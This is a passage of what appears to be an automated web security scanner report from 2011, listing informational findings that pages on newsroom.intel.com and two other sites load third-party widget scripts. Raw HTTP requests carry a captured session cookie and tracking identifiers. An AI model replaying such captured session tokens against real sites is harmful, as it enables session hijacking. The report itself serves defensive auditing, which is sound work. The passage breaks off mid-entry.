Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:15 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137373b332c323137393b332c323037373b3130322c313830313b3130322c313430353b3130322c313430363b33382c313931393b33382c313936303b33382c313538363b33382c313935393b33382c313934363b33382c313936333b31342c323031363b31342c323032373b31342c323031303b31342c323030363b31342c323030373b31342c323031313b31342c323030343b31342c323030353b31342c323032353b; Expires=Mon, 07-Mar-2011 23:15:17 GMT; Path=/
X-JAL: 123
Content-Language: en-US
CacheHit: D=166884 t=1296947715224417
X-JSL: D=166890 t=1296947715224417
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

18.81. http://newsroom.intel.com/people/KrystalTemple  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /people/KrystalTemple

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://widgets.digg.com/buttons.js
  • http://www.google.com/buzz/api/button.js

Request

GET /people/KrystalTemple HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:11 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323037373b332c323137393b332c323137373b33382c313931393b33382c313936303b33382c313538363b33382c313935393b33382c313934363b33382c313936333b31342c323030363b31342c323031363b31342c323031303b31342c323032373b31342c323030373b31342c323031313b31342c323030343b31342c323030353b31342c323032353b; Expires=Mon, 07-Mar-2011 23:15:13 GMT; Path=/
X-JAL: 76
Content-Language: en-US
CacheHit: D=89700 t=1296947711726745
X-JSL: D=89705 t=1296947711726745
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

18.82. http://newsroom.intel.com/people/cldotts  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /people/cldotts

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://widgets.digg.com/buttons.js
  • http://www.google.com/buzz/api/button.js

Request

GET /people/cldotts HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:09 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c323137373b332c323037373b332c323137393b332c333031313b33382c313931393b33382c313936303b33382c313538363b33382c313935393b33382c313934363b33382c313936333b31342c323031363b31342c323032373b31342c323030363b31342c323031303b31342c323030373b31342c323031313b31342c323030343b31342c323030353b31342c323032353b; Expires=Mon, 07-Mar-2011 23:15:11 GMT; Path=/
X-JAL: 117
Content-Language: en-US
CacheHit: D=137232 t=1296947709400280
X-JSL: D=137238 t=1296947709400280
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

18.83. http://newsroom.intel.com/people/pdarling  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /people/pdarling

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://widgets.digg.com/buttons.js
  • http://www.google.com/buzz/api/button.js

Request

GET /people/pdarling HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:06 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c323037373b332c333031313b332c323137393b332c323137373b33382c313931393b33382c313936303b33382c313538363b33382c313935393b33382c313934363b33382c313936333b31342c323032373b31342c323031313b31342c323030373b31342c323031363b31342c323031303b31342c323030363b31342c323030343b31342c323030353b31342c323032353b; Expires=Mon, 07-Mar-2011 23:15:08 GMT; Path=/
X-JAL: 129
Content-Language: en-US
CacheHit: D=153068 t=1296947706373010
X-JSL: D=153074 t=1296947706373010
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

18.84. http://newsroom.intel.com/people/suzyintel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /people/suzyintel

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://widgets.digg.com/buttons.js
  • http://www.google.com/buzz/api/button.js

Request

GET /people/suzyintel HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:09 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c323137393b332c323037373b332c323137373b332c333031313b33382c313931393b33382c313936303b33382c313538363b33382c313935393b33382c313934363b33382c313936333b31342c323030363b31342c323031303b31342c323031363b31342c323030373b31342c323032373b31342c323031313b31342c323030343b31342c323030353b31342c323032353b; Expires=Mon, 07-Mar-2011 23:15:11 GMT; Path=/
X-JAL: 79
Content-Language: en-US
CacheHit: D=89140 t=1296947709252096
X-JSL: D=89145 t=1296947709252096
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

18.85. http://newsroom.intel.com/recent-updates.jspa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /recent-updates.jspa

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://widgets.digg.com/buttons.js
  • http://www.google.com/buzz/api/button.js

Request

GET /recent-updates.jspa HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:14 GMT
Server: Apache
X-JAL: 101
Content-Language: en-US
CacheHit: D=195551 t=1296947714513336
X-JSL: D=195556 t=1296947714513336
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

18.86. http://newsroom.intel.com/search.jspa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /search.jspa

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://widgets.digg.com/buttons.js
  • http://www.google.com/buzz/api/button.js

Request

GET /search.jspa HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:36 GMT
Server: Apache
X-JAL: 13
Content-Language: en-US
CacheHit: D=27242 t=1296947736460077
X-JSL: D=27247 t=1296947736460077
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

18.87. http://objectivemarketer.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://objectivemarketer.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://files.go2web20.net/twitterbadge/1.0/badge.js
  • http://platform.twitter.com/anywhere.js?id=rANU0yUeWajtzIYgWo9PKA&v=1

Request

GET / HTTP/1.1
Host: objectivemarketer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:21:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Vary: User-Agent,Accept,Accept-Encoding
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 3cf9af507c272e66cd36478b26071629=sai9qbst3amoinsloek35rc7u2; path=/
Set-Cookie: ja_kyanite_tpl=ja_kyanite; expires=Thu, 26-Jan-2012 23:21:09 GMT; path=/
Last-Modified: Sat, 05 Feb 2011 23:21:10 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22150


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<!-- HEADER -->
   <script src="http://platform.twitter.com/anywhere.js?id=rANU0yUeWajtzIYgWo9PKA&v=1" type="text/javascript"></script>
...[SNIP]...
<!-- twitter follow badge by go2web20 -->
<script src='http://files.go2web20.net/twitterbadge/1.0/badge.js' type='text/javascript'></script>
...[SNIP]...

18.88. http://opentools.homeip.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://opentools.homeip.net
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.gstatic.com/sites/p/2fa342/system/js/jot_min_view__en.js

Request

GET / HTTP/1.1
Host: opentools.homeip.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-Robots-Tag: noarchive
Last-Modified: Sat, 05 Feb 2011 19:27:44 GMT
ETag: "1296934064090|#public|en|||0"
Expires: Sat, 05 Feb 2011 23:17:13 GMT
Date: Sat, 05 Feb 2011 23:17:13 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascri
...[SNIP]...
</script>
<script xmlns="http://www.w3.org/1999/xhtml" src="http://www.gstatic.com/sites/p/2fa342/system/js/jot_min_view__en.js"></script>
...[SNIP]...

18.89. http://opentools.homeip.net/dev-tools-for-upnp
 previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://opentools.homeip.net
Path:   /dev-tools-for-upnp<BR/

Issue detail

The response dynamically includes the following script from another domain:
